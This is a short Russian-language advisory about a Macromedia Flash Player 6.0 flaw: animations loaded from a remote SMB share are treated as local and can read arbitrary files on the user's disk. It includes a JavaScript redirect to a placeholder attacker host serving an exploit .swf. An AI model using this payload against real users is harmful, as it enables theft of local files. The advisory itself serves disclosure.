Ошибка, обнаруженная в Flash player, позволяет Flash
анимациям читать произвольные локальные файлы. 

Уязвимость происходит из-за ошибки в Flash Player при загрузке
анимации от удаленных SMB ресурсов. Когда Flash Player загружает анимацию от сетевого SMB ресурса,
он обрабатывается ее так, как если бы была загружена с локального жесткого диска пользователя. Уязвимость может использоваться через Web страницу, содержащую
следующий код: 

<script language="javascript"> 
document.location.href='\\\\HOST_IP\\exploit\\read.swf'; 
</script> 

Уязвимость обнаружена в Macromedia Flash 6.0-6.0.47.

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии